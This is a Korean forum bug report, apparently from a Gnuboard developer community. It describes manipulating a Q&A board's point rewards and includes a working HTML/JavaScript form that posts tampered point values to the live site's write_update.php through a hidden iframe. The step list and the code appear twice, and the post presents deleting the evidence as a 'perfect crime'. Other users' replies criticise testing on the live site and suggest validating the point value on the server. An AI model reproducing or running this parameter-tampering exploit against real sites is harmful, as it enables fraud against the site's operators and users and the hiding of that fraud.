버그 정보
버그본문
1. 글 작성시 - 포인트 값으로 작성하며, 외부에서 POST 으로 직접적으로 /bbs/write_update.php 파일에 요청한다.
2. 다시 글 수정시 + 포인트 값으로 수정하며, 역시 외부에서 요청한다.
3. 답변을 채택하였을 경우 글을 한번 더 수정을 한다.
※ 수정이 되었을 경우 미채택 상태로 돌아가며, 댓글과 함께 게시물을 삭제하면 완전 범죄가 된다.
단, 포인트 내역에는 자료가 존재한다.
<html>
<head>
<title>질문답변 조작하기</title>
</head>
<body>
<form name="fbbs" method="post" action="javascript:fbbs_submit(document.fbbs);">
<table>
<tr height="30">
<td width="120">게시판 아이디</td>
<td><input type="text" name="bo_table" value="g4_qa" /></td>
</tr>
<tr height="30">
<td>글쓰기</td>
<td><input type="radio" name="w" value="" checked onclick="bbs_type('new');" /> 새글 <input type="radio" name="w" value="u" onclick="bbs_type('edit');" /> 수정</td>
</tr>
<tr height="30">
<td>wr_id</td>
<td><input type="text" name="wr_id" value="" /> (수정일 경우 wr_id 값을 입력해주세요.)</td>
</tr>
<tr height="30">
<td>제목</td>
<td><input type="text" name="wr_subject" value="?" /></td>
</tr>
<tr height="30">
<td>내용</td>
<td><input type="text" name="wr_content" value="?" /></td>
</tr>
<tr height="30">
<td>포인트</td>
<td><input type="text" id="wr_1" name="wr_1" value="-1000" /></td>
</tr>
<tr height="30">
<td colspan="2"><input type="submit" value="확인" /></td>
</tr>
</table>
</form>
<iframe width=0 height=0 name='hiddenframe' style='display:none;'></iframe>
<script type="text/javascript">
function bbs_type(id)
{
var f = document.fbbs;
if (id == 'new') {
f.wr_id.value = "";
f.wr_1.value = "-1000";
} else {
f.wr_id.value = "";
f.wr_1.value = "99999";
}
}
function fbbs_submit(f)
{
f.action = "http://sir.co.kr/bbs/write_update.php";
f.target = "hiddenframe";
f.submit();
}
</script>
</body>
</html>
2. 다시 글 수정시 + 포인트 값으로 수정하며, 역시 외부에서 요청한다.
3. 답변을 채택하였을 경우 글을 한번 더 수정을 한다.
※ 수정이 되었을 경우 미채택 상태로 돌아가며, 댓글과 함께 게시물을 삭제하면 완전 범죄가 된다.
단, 포인트 내역에는 자료가 존재한다.
<html>
<head>
<title>질문답변 조작하기</title>
</head>
<body>
<form name="fbbs" method="post" action="javascript:fbbs_submit(document.fbbs);">
<table>
<tr height="30">
<td width="120">게시판 아이디</td>
<td><input type="text" name="bo_table" value="g4_qa" /></td>
</tr>
<tr height="30">
<td>글쓰기</td>
<td><input type="radio" name="w" value="" checked onclick="bbs_type('new');" /> 새글 <input type="radio" name="w" value="u" onclick="bbs_type('edit');" /> 수정</td>
</tr>
<tr height="30">
<td>wr_id</td>
<td><input type="text" name="wr_id" value="" /> (수정일 경우 wr_id 값을 입력해주세요.)</td>
</tr>
<tr height="30">
<td>제목</td>
<td><input type="text" name="wr_subject" value="?" /></td>
</tr>
<tr height="30">
<td>내용</td>
<td><input type="text" name="wr_content" value="?" /></td>
</tr>
<tr height="30">
<td>포인트</td>
<td><input type="text" id="wr_1" name="wr_1" value="-1000" /></td>
</tr>
<tr height="30">
<td colspan="2"><input type="submit" value="확인" /></td>
</tr>
</table>
</form>
<iframe width=0 height=0 name='hiddenframe' style='display:none;'></iframe>
<script type="text/javascript">
function bbs_type(id)
{
var f = document.fbbs;
if (id == 'new') {
f.wr_id.value = "";
f.wr_1.value = "-1000";
} else {
f.wr_id.value = "";
f.wr_1.value = "99999";
}
}
function fbbs_submit(f)
{
f.action = "http://sir.co.kr/bbs/write_update.php";
f.target = "hiddenframe";
f.submit();
}
</script>
</body>
</html>
추천
0
0
댓글 9개
막는 방법은 간단히 writeupdate 에서 포인트값을 검시함
관리자님이 그런말 해죠.. 그누홈피엔 왠만하면 테스트좀 삼가해달라고 해던기억이 ^^
상식에서 접근하세요. 세상의 모든 프로그램은 완벽할 수 없습니다. 더군다나 많은 유저가 함께 이용하는 개발자 사이트에서 완전하지 못하다고 해서 마냥 테스트를 남발하면 나름대로 자아도취에 빠질 수는 있겠지만 많은 사람들에게 피해를 줄 수 있다는 것쯤은 상식이겠지요.
역으로 님이 제작하거나 운영하는 곳에 가서 이런 테스트를 직접적으로 진행한다면 님은 어떠실 것 같습니까? 한 번 더 생각한 후 실행에 옮기는 성숙한 자세가 필요할 듯 합니다.
역으로 님이 제작하거나 운영하는 곳에 가서 이런 테스트를 직접적으로 진행한다면 님은 어떠실 것 같습니까? 한 번 더 생각한 후 실행에 옮기는 성숙한 자세가 필요할 듯 합니다.
상식적으로 접근합시다 (2)
조용히 관리자님께 비글로 요청하면 될것을 ;; 에궁..
조용히 관리자님께 비글로 요청하면 될것을 ;; 에궁..
그냥 운영자님께 쪽지로 하면 좋았을거라는 생각이드네요.-_ㅜ
조용히 메일로 넣어 주시지~~
어제.. 질답 보고 놀랐는데..
- 포인트 부터 시작해서~~ ㅋ
어제.. 질답 보고 놀랐는데..
- 포인트 부터 시작해서~~ ㅋ
유아원님 맞으시죠...?
저 맞습니다.
킁 ㅡ.ㅡ;; 아원띠였구낭 ;; ㅋㅋ